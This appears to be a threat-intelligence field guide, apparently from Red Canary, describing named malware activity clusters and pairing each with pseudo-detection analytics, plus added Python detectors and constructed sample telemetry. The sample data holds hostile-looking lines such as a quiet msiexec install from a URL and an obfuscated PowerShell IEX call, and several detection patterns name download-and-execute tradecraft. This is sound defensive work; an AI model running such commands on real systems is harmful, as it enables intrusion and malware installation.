Field Guide to Color Bird Threats

A definitive guide to “color birds,” what we call fledgling activity clusters we’ve named after tracking patterns of malicious behavior.

You may have noticed some unusual names in Red Canary’s reporting; when our Intelligence team encounters a cluster of activity that does not match any known threats we are tracking, we use a naming convention inspired by Red Canary’s own name: color + bird. We choose the various colors and bird species with help from our resident birdwatchers, who make connections based on ornithological behavior similarities. We’re partial to alliteration.

In this new and handy field guide, we’ve rounded up the most interesting activity clusters we’ve named and tracked over the last few years, including some endangered species we haven’t seen in a while.

Key

  • First observed: Date we started tracking the activity cluster
  • Release date: Date we released the threat profile to customers
  • Last observed: Date of the last time the threat was seen (as of December 31, 2024)

Tangerine Turkey

First observed: November 2024

Release date: December 2024

Last observed: December 2024


Field notes

Tangerine Turkey is an activity cluster characterized by a Visual Basic Script (VBScript) worm delivering a cryptomining payload, typically via infected USB drives. The VBScript file name typically begins with the letter x followed by six digits, for example x644291.vbs. A CMD child process of wscript.exe then executes a BAT file with a similar naming convention and creates a folder named C:\Windows \System32 (note the space after Windows). The worm copies the legitimate printui.exe from C:\Windows\System32 into the newly created C:\Windows \System32 folder alongside a malicious DLL named printui.dll, which the relocated printui.exe sideloads (a DLL hijack).

Sightings

Detection for birders

The following pseudo-detection analytic identifies instances of printui.exe relocated outside of Windows\System32.

process_path_is_unexpected == ('printui.exe')

Amber Albatross

First observed: January 2024

Release date: March 2024

Last observed: December 2024

Field notes

Amber Albatross, our fifth most prevalent threat of 2024, is an activity cluster characterized by certain potentially unwanted programs (PUPs) delivering a setup file and a stealer payload. A complex installation chain with obfuscation and anti-analysis techniques eventually unpacks a Pyarmor-obfuscated PyInstaller executable that is launched via cmd.exe and powershell.exe, before initiating a sequence of reconnaissance commands similar to those used by many stealers.

Sightings

Detection for birders

The following pseudo-detection analytic looks for PowerShell processes executing binaries from the temp directory that do not have a file extension.

process == ('powershell.exe')
&&
command_line_includes ('Start-Process')
&&
filemod_path_includes ('AppData\Local\Temp')
&&
filemod_extension == ('')

Saffron Starling

First observed: September 2022

Release date: July 2024

Last observed: August 2024


Field notes

Saffron Starling is an activity cluster that downloads and delivers malicious payloads following a phishing attempt. Specifically, the loader is delivered via ZIP archives containing JScript or VBScript. When executed, the scripts create a renamed copy of cURL and download the subsequent payload, which includes Danabot, DarkGate, or Matanbuchus malware. In some cases, a PDF file is downloaded and presented to the user in order to distract from payload deployment.

Sightings

Detection for birders

The following pseudo-detection analytic identifies renamed instances of cURL. See our blog on profiling executable metadata for additional guidance on how to implement the following detector idea.

process_is_renamed == ('curl')

Scarlet Goldfinch

First observed: June 2023

Release date: August 2023

Last observed: December 2024


Field notes

Scarlet Goldfinch, our third most prevalent threat of 2024, is an activity cluster that lures unsuspecting victims to download a malicious browser update, similar to SocGholish and other fake update threats. To get access to systems, Scarlet Goldfinch redirects users from compromised sites that contain injected JScript code to a site that prompts victims to download a fake update to their internet browser. The download contains the first-stage JScript that is executed via wscript.exe. Upon execution, the JScript downloads an additional payload, which has consistently been NetSupport Manager.

Sightings

Other names

  • HANEYMANEY
  • SmartApeSG
  • ZPHP

Detection for birders

The following pseudo-detection analytic looks for execution of NetSupport Manager from a non-standard directory (i.e. somewhere other than the Program Files directory).

process_path_is_unexpected == ('client32.exe')

Lilac Lyrebird

First observed: March 2023

Release date: April 2023

Last observed: December 2024

Field notes

Lilac Lyrebird is an activity cluster associated with search engine optimization (SEO) poisoning and malvertising. It leads to a technical support scam that tricks users into giving the operator access to their machine via LogMeIn. Once the adversary gains access, they use PowerShell to download a malicious batch file that is executed via the creation of a scheduled task.

Sightings

Detection for birders

The following pseudo-detection analytic looks for instances of PowerShell using iex(New-Object Net.WebClient).DownloadString to download files hosted remotely. Note that you will need to tune this for your environment.

process == ('powershell.exe')
&&
command_line_includes ('downloadstring')
&&
command_line_does_not_include (*)

Charcoal Stork

First observed: March 2023

Release date: April 2023

Last observed: December 2024

Field notes

Charcoal Stork is an activity cluster involving a suspected pay-per-install content provider that relies on malvertising to deliver installers. These installers masquerade as anything from cracked games to wallpaper, and their goal is to install malicious payloads. Early Charcoal Stork campaigns delivered ChromeLoader and SmashJacker, while sightings in 2023 delivered more concerning malware such as VileRAT, a Python remote access trojan (RAT) that is reportedly used exclusively by a cyber mercenary group called DeathStalker. Files associated with Charcoal Stork have a default filename of install.exe or Your File Is Ready to Download. We primarily distinguish Charcoal Stork activity from follow-on activity through installer file names and hashes.

Sightings

Detection for birders

Look for tactics, techniques, and procedures consistent with known payloads of Charcoal Stork, including ChromeLoader and SmashJacker.

Other filenames we have seen in the wild include:

  • 1680x1050 european robin garden inhabitant_ rob___.msi
  • 22621.1778.230511-2102.ni_release_svc_prod3_windowssdk.iso
  • z7550_97650_syr-2023.32-sspsy-20230802.2023_0821.6.iso
  • download.iso
  • download (1).iso
  • browse fmovies.iso
  • file_ elden.ring.deluxe.edition.v1.03.3.zip.tor....iso
  • sing 2_ ¡ven y canta de nuevo! (2021).iso

Raspberry Robin

First observed: September 2021

Release date: February 2022

Last observed: December 2024

Field notes

Raspberry Robin is an activity cluster involving a worm, possibly installed via USB drive, that may be related to ransomware. This activity cluster uses msiexec.exe to call out to infrastructure, typically compromised QNAP devices, using HTTP requests that contain user and device names of the victim. This has led to the downloading and execution of malicious DLL files.

Sightings

Other names

  • QNAP Worm

Detection for birders

The following pseudo-detection analytic looks for msiexec.exe making outbound network connections to download and install packages from the command line. Surfacing this behavior provides an opportunity to examine the activity and determine whether it is malicious.

process == ('msiexec.exe')
&&
command_line_includes ('http:' || 'https:')
&&
command_line_includes ('/q' || '-q')

Mango Parakeet

First observed: April 2020

Release date: July 2021

Last observed: August 2024

Field notes

Mango Parakeet is an activity cluster characterized by subtle masquerading techniques, such as naming malicious binaries svcnost.exe to mimic svchost.exe, renaming wscript.exe to execute malicious JS files, using rudimentary homograph spoofing such as replacing a lower-case l with a capital I, and extending spacing between the malicious executable’s name and extension. Mango Parakeet is often observed spreading malicious worms via USB flash drives. During execution, Mango Parakeet uses cmd.exe to launch batch scripts to create malicious executables, JavaScript, and DLL files on a target system. It then launches the malicious JavaScript file using a renamed instance of wscript.exe.
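As an added Python example, not Red Canary's code, here is how the Mango Parakeet masquerading tricks just described, and the renamed-binary idea behind Saffron Starling's process_is_renamed analytic, translate into file-name checks: padding before the extension, homoglyph substitution, one-character lookalikes such as svcnost.exe, and an on-disk name that disagrees with the PE version resource's OriginalFilename. The known-binary set and the homoglyph map are assumptions to be tuned.

```python
import ntpath

# Windows process names an adversary is likely to imitate; extend for your estate.
KNOWN_BINARIES = {"svchost.exe", "wscript.exe", "cscript.exe", "lsass.exe",
                  "explorer.exe", "rundll32.exe", "curl.exe"}

# Look-alike characters: capital I and digit 1 for l, digit 0 for o. Applied
# before casefolding, because casefold() would turn the tell-tale I into i.
HOMOGLYPHS = str.maketrans({"I": "l", "1": "l", "0": "o"})


def levenshtein(a: str, b: str) -> int:
    """Edit distance; enough to pair svcnost.exe with svchost.exe."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def masquerade_findings(file_name: str) -> list[str]:
    """Reasons a file name looks like a masquerade; [] for a clean name or for an
    exact known name (renamed copies of known binaries are is_renamed's job)."""
    findings = []
    stem, ext = ntpath.splitext(file_name)
    if stem != stem.rstrip():            # "photo.jpg            .exe"
        findings.append("padding before extension")
    compact = stem.strip() + ext
    folded = compact.casefold()
    if folded in KNOWN_BINARIES:
        return findings
    deglyphed = compact.translate(HOMOGLYPHS).casefold()
    if deglyphed in KNOWN_BINARIES:
        findings.append(f"homograph of {deglyphed}")   # Isass.exe -> lsass.exe
    for known in sorted(KNOWN_BINARIES):
        if levenshtein(folded, known) == 1:
            findings.append(f"lookalike of {known}")   # svcnost.exe -> svchost.exe
    return findings


def is_renamed(file_name: str, original_filename: str) -> bool:
    """process_is_renamed: the on-disk name differs from the OriginalFilename stored
    in the PE version resource (a renamed wscript.exe or cURL copy)."""
    stem = ntpath.splitext(file_name)[0].casefold()
    return stem != ntpath.splitext(original_filename)[0].casefold()
```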

Detection for birders

The following pseudo-detection analytic looks for Windows Script Host (wscript.exe) running from an unexpected directory.

process_path_is_unexpected == ('wscript.exe')
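Tangerine Turkey (printui.exe), Scarlet Goldfinch (client32.exe) and Mango Parakeet (wscript.exe) all use process_path_is_unexpected, so one implementation serves all three. The Python below is an added example, not Red Canary's code; the NetSupport install directories and the sample paths are assumptions. It also shows why a match on only the last two path components misses Tangerine Turkey's C:\Windows \System32 folder.

```python
import ntpath

# Known-good directories per profiled binary (casefolded, no trailing backslash).
# The NetSupport directories are an assumption; the page only says "Program Files".
EXPECTED_DIRS = {
    "printui.exe": {r"c:\windows\system32", r"c:\windows\syswow64"},
    "wscript.exe": {r"c:\windows\system32", r"c:\windows\syswow64"},
    "client32.exe": {
        r"c:\program files\netsupport\netsupport manager",
        r"c:\program files (x86)\netsupport\netsupport manager",
    },
}


def path_is_unexpected(image_path: str) -> bool:
    """process_path_is_unexpected: a profiled binary running from a directory
    that is not one of its known install locations."""
    directory, name = ntpath.split(ntpath.normpath(image_path))
    expected = EXPECTED_DIRS.get(name.casefold())
    if expected is None:
        return False  # not a binary this analytic profiles
    # Compare the whole directory; case-insensitive, but whitespace is significant:
    # Tangerine Turkey's "C:\Windows \System32" must not equal "C:\Windows\System32".
    return directory.casefold() not in expected


def suffix_check_is_unexpected(image_path: str) -> bool:
    """The shortcut many analysts write first: look only at the last two path
    components. Kept to show that it misses the Tangerine Turkey folder."""
    return not image_path.casefold().endswith(r"\system32\printui.exe")


def find_unexpected(events: list[dict]) -> list[str]:
    """Return the image paths of the events that fire the analytic."""
    return [e["image_path"] for e in events if path_is_unexpected(e["image_path"])]


# Constructed sample telemetry, not real sightings.
SAMPLE_EVENTS = [
    {"image_path": r"C:\Windows\System32\printui.exe"},                      # legitimate
    {"image_path": r"C:\Windows \System32\printui.exe"},                     # Tangerine Turkey
    {"image_path": r"C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe"},
    {"image_path": r"C:\Users\Public\Libraries\client32.exe"},               # Scarlet Goldfinch
    {"image_path": r"C:\Windows\System32\wscript.exe"},                      # legitimate
    {"image_path": r"C:\ProgramData\wscript.exe"},                           # Mango Parakeet
    {"image_path": r"C:\Temp\notepad.exe"},                                  # not profiled
]

if __name__ == "__main__":
    print(find_unexpected(SAMPLE_EVENTS))
```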

Yellow Cockatoo

First observed: October 2020

Release date: December 2020

Last observed: November 2024

Field notes

Yellow Cockatoo is an activity cluster that is characterized by search engine redirects eventually leading to the in-memory execution of a .NET remote access trojan (RAT). Yellow Cockatoo’s malware has the capability to drop additional payloads and use encoded PowerShell to steal browser information. Interestingly, this bird is known to “fly south for the winter,” in that it takes breaks after researchers publish information about its operations, resuming activity months later after retooling.

Sightings

Other names

  • Jupyter Infostealer
  • Polazert
  • Solarmarker

Detection for birders

The following pseudo-detection analytic looks for a startup folder persistence mechanism shared by multiple threats: PowerShell writing a shortcut (.lnk) file into the Start Menu Startup folder.

process == ('powershell.exe')
&&
filemod_path_includes ('start menu\programs\startup')
&&
filemod_extension == ('.lnk')

Silver Toucan

First observed: September 2020

Release date: January 2021

Last observed: December 2024

Field notes

Silver Toucan is an activity cluster that uses signed macOS malware to deploy payloads such as AdLoad, often for ad fraud and other monetization activities. Silver Toucan discloses its own terms of service stating that victim hosts may be used for proxy activities. This cluster requires user interaction with an Apple Disk Image File (DMG) or macOS Installer File (PKG). Once executed, Silver Toucan establishes persistence using macOS LaunchAgents. The cluster uses the cURL utility to conduct command and control (C2) operations, log installation and update progress, and to receive bash commands to download and execute additional files. In some cases, Silver Toucan delivers AdLoad malware as a payload.

Sightings

Other names

  • UpdateAgent

Detection for birders

The following pseudo-detection analytic looks for a shell process executing a file downloaded using the curl utility.

process == (any osx shell)
&&
command_line_includes ('curl ' && ';eval')

Endangered species

Coral Crane

First observed: November 2021

Release date: February 2022

Last observed: March 2023

Field notes

Coral Crane is an activity cluster that uses ISO images containing malicious VBScript code followed by obfuscated PowerShell commands to filelessly download and execute payloads such as AsyncRAT. The activity cluster uses simple obfuscation through string replacement in PowerShell commands to deobfuscate code prior to execution.

Sightings

Detection for birders

The following pseudo-detection analytic looks for wscript.exe spawning PowerShell that uses Invoke-Expression or one of its aliases.

process == ('powershell.exe')
&&
any_parent_process == ('wscript.exe')
&&
command_line_includes ('iex' || 'invoke' || 'invoke-expression')
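The Coral Crane analytic above, and the Raspberry Robin one earlier, need two things a flat field match does not give you: a walk up the process ancestry for any_parent_process and an OR over command-line tokens. Here is an added Python sketch of both over a constructed process tree; it is not Red Canary's code, and the process names, paths and example.invalid host are made up.

```python
from dataclasses import dataclass

@dataclass(frozen=True)
class Proc:
    pid: int
    ppid: int
    name: str
    cmdline: str

def ancestors(proc, by_pid):
    """any_parent_process: walk up the tree; tolerate a missing parent and a ppid loop."""
    seen = {proc.pid}
    parent = by_pid.get(proc.ppid)
    while parent is not None and parent.pid not in seen:
        seen.add(parent.pid)
        yield parent
        parent = by_pid.get(parent.ppid)

def includes_any(cmdline, *needles):
    """command_line_includes ('a' || 'b'): case-insensitive substring match; tighten per environment."""
    folded = cmdline.casefold()
    return any(n.casefold() in folded for n in needles)

def coral_crane(proc, by_pid):
    # PowerShell with wscript.exe anywhere above it (here via cmd.exe) invoking iex
    return (proc.name.casefold() == "powershell.exe"
            and any(p.name.casefold() == "wscript.exe" for p in ancestors(proc, by_pid))
            and includes_any(proc.cmdline, "iex", "invoke", "invoke-expression"))

def raspberry_robin(proc, by_pid):
    # msiexec.exe fetching a package from a URL with a quiet switch (by_pid unused)
    return (proc.name.casefold() == "msiexec.exe"
            and includes_any(proc.cmdline, "http:", "https:")
            and includes_any(proc.cmdline, "/q", "-q"))

ANALYTICS = {"Coral Crane": coral_crane, "Raspberry Robin": raspberry_robin}

def hits(procs):
    """pid -> names of the analytics that fired on that process."""
    by_pid = {p.pid: p for p in procs}
    fired = {p.pid: [n for n, f in ANALYTICS.items() if f(p, by_pid)] for p in procs}
    return {pid: names for pid, names in fired.items() if names}

# Constructed process tree, not real telemetry; pid 100's parent is deliberately absent.
SAMPLE = [
    Proc(100, 1, "wscript.exe", 'wscript.exe "E:\\invoice.vbs"'),
    Proc(101, 100, "cmd.exe", 'cmd /c "C:\\Users\\Public\\run.bat"'),
    Proc(102, 101, "powershell.exe", "powershell -w hidden -c \"IEX ('Ne$t-Object'.replace('$','w'))\""),
    Proc(200, 1, "msiexec.exe", "msiexec /q /i http://example.invalid/pkg.msi"),
]
```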

Silver Sparrow

First observed: January 2021

Release date: February 2021

Last observed: August 2023

Field notes

Silver Sparrow is an activity cluster with infrastructure designed to deliver malware to macOS systems. It leverages AWS S3 buckets to stage macOS PKG files with names like update.pkg or updater.pkg. During execution, the malware executes JavaScript to orchestrate the creation of files and scripts for persistent execution, attempting to download updated payloads from additional S3 buckets every hour. There are specialized variants of Silver Sparrow for the x86_64 and the Apple M1 ARM64 architectures, implying that the malware was intended specifically for newer macOS systems.

Sightings

Detection for birders

The following pseudo-detection analytic looks for use of the plistbuddy command, a built-in tool in macOS that allows administrators to manipulate property lists, or plist, files used to configure various parts of the macOS operating system.

process == ('plistbuddy')
&&
command_line_includes ('RunAtLoad')

Blue Mockingbird

First observed: February 2020

Release date: August 2020

Last observed: June 2023

Field notes

Blue Mockingbird is an activity cluster that deploys a DLL version of XMRig on Windows systems. Tracked publicly since August 2020, the threat achieves initial access by exploiting public-facing applications, eventually establishing persistence by using the COR_PROFILER environment variable to hijack execution flow, task scheduling, or service installation. To execute, Blue Mockingbird either registers the DLL with regsvr32.exe or executes using rundll32.exe. Ultimately, the cluster tries to use system resources to mine cryptocurrency, specifically referring to Monero wallet addresses.

Sightings

Detection for birders

The following pseudo-detection analytic looks for wmic.exe manipulating the COR_PROFILER environment variable to establish persistence and bypass UAC.

process == ('wmic.exe')
&&
command_line_includes ('COR_PROFILER')
